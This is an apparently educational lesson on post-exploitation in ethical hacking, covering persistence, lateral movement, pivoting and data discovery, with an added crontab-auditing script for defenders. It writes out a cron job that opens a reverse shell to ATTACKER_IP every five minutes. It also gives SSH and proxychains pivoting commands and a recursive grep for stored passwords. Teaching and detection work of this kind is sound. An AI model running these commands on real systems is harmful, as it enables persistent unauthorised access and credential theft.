Post-exploitation is what happens after gaining initial access. It demonstrates the true impact of a vulnerability by showing how far an attacker could go. Professional reporting then translates these technical findings into actionable recommendations for the organisation.
| Objective | Description |
|---|---|
| Maintain access | Establish persistent backdoors |
| Escalate privileges | Move from user to administrator/root |
| Lateral movement | Pivot to other systems on the network |
| Data discovery | Find sensitive data, credentials, configurations |
| Data exfiltration | Demonstrate that data can be extracted |
| Cover tracks | Understand how attackers hide their activity |
Tip: In ethical hacking, post-exploitation must stay within the agreed scope. Document everything and avoid unnecessary data access or system modifications.
Persistence ensures continued access if the initial entry point is patched:
| Technique | Platform | Description |
|---|---|---|
| Cron jobs | Linux | Schedule a reverse shell to connect periodically |
| SSH keys | Linux | Add attacker's public key to ~/.ssh/authorized_keys |
| Scheduled tasks | Windows | Use Task Scheduler for persistent execution |
| Registry run keys | Windows | Add entries to auto-start on login |
| Web shells | Web servers | Upload a PHP/ASP shell to the web root |
| Service creation | Windows | Create a service that runs attacker code |
| Startup scripts | Linux | Add commands to .bashrc, .profile, or init scripts |
```bash
# Add a reverse shell that connects every 5 minutes.
# `crontab -l` prints the existing entries so they are preserved; the new line is
# appended to that list and the result is written back with `crontab -`.
(crontab -l; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'") | crontab -
```
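A defender-side check for the cron persistence shown above, added here as an example and not part of the original lesson: it parses a user crontab and flags entries carrying reverse-shell indicators such as the `/dev/tcp/` redirection and an interactive `bash -i`. The indicator list, the 10-minute frequency threshold and the sample crontab (with the documentation address 203.0.113.10 standing in for ATTACKER_IP) are all constructed assumptions.

```python
import re

# Indicators for the cron reverse shell shown above; this list is an assumption
# made for the example, not a complete signature set.
INDICATORS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/[^/\s]+/\d+"),     # bash TCP pseudo-device
    "interactive_shell": re.compile(r"\b(?:ba)?sh\s+-i\b"),  # interactive shell spawn
    "stdio_redirected": re.compile(r"0>&1|>&\s*/dev/tcp"),   # stdin/stdout tied to socket
}
FREQUENT_MINUTES = 10  # assumed threshold: "*/N" with N <= 10 counts as high frequency


def parse_entries(crontab_text):
    """Yield (line_no, schedule, command) for user-crontab lines (5 fields or @special)."""
    for n, raw in enumerate(crontab_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank, comment, or environment line such as MAILTO=
        if line.startswith("@"):
            parts = line.split(None, 1)   # @reboot, @daily, ... followed by the command
        else:
            parts = line.split(None, 5)   # five schedule fields, then the command
            parts = [" ".join(parts[:5]), parts[5]] if len(parts) == 6 else []
        if len(parts) == 2:
            yield n, parts[0], parts[1]


def audit_crontab(crontab_text):
    """Return {line_no, schedule, command, indicators} dicts for suspicious entries."""
    findings = []
    for n, schedule, command in parse_entries(crontab_text):
        hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
        if not hits:
            continue
        m = re.match(r"^\*/(\d+)$", schedule.split()[0])  # minute field "*/N"
        if m and int(m.group(1)) <= FREQUENT_MINUTES:
            hits.append("high_frequency")
        findings.append({"line_no": n, "schedule": schedule, "command": command,
                         "indicators": hits})
    return findings


# Constructed sample crontab (not captured from a real host); 203.0.113.10 is a
# documentation address standing in for ATTACKER_IP.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 2 * * * /usr/local/bin/backup.sh --full
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'
@reboot /usr/bin/python3 /opt/app/worker.py
"""
```

Run `audit_crontab(SAMPLE_CRONTAB)` to see the flagged entry; on a live host feed it the output of `crontab -l` for each user.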
Moving from a compromised system to other systems on the network:
| Technique | Description | Tools |
|---|---|---|
| Pass the Hash | Use captured NTLM hashes to authenticate | CrackMapExec, Mimikatz |
| Pass the Ticket | Use Kerberos tickets for authentication | Mimikatz, Rubeus |
| PSExec | Remote command execution on Windows | Sysinternals PsExec, Impacket |
| WMI | Windows Management Instrumentation for remote execution | wmiexec |
| SSH pivoting | Tunnel through compromised hosts | SSH port forwarding |
| RDP | Remote desktop to other Windows systems | xfreerdp, rdesktop |
Pivoting uses a compromised host as a bridge to reach otherwise inaccessible networks:
```text
┌──────────┐        ┌──────────────┐        ┌──────────────┐
│ Attacker │ ───→   │ Compromised  │ ───→   │ Internal     │
│ Machine  │        │ Host (DMZ)   │        │ Server       │
│          │        │ 10.0.0.5     │        │ 10.10.0.100  │
└──────────┘        └──────────────┘        └──────────────┘
```

The attacker cannot reach 10.10.0.100 directly.
Pivoting through 10.0.0.5 gives access to the internal network.
```bash
# SSH local port forwarding: local port 8080 is forwarded through 10.0.0.5 to
# 10.10.0.100:80, so http://localhost:8080 reaches the internal web server
ssh -L 8080:10.10.0.100:80 user@10.0.0.5
# SSH dynamic port forwarding: a SOCKS proxy on local port 9050 that routes
# connections to any destination through 10.0.0.5
ssh -D 9050 user@10.0.0.5
# Using proxychains with the SOCKS proxy (proxychains must be configured to use
# 127.0.0.1:9050); a full TCP connect scan (-sT) is required, as SYN scans cannot
# be relayed through a SOCKS proxy
proxychains nmap -sT -p 80,443 10.10.0.100
```
Find valuable data on compromised systems:
```bash
# Search for configuration files with passwords; 2>/dev/null hides the
# permission-denied errors from paths the current user cannot read
grep -r "password" /etc/ /var/www/ /opt/ 2>/dev/null
```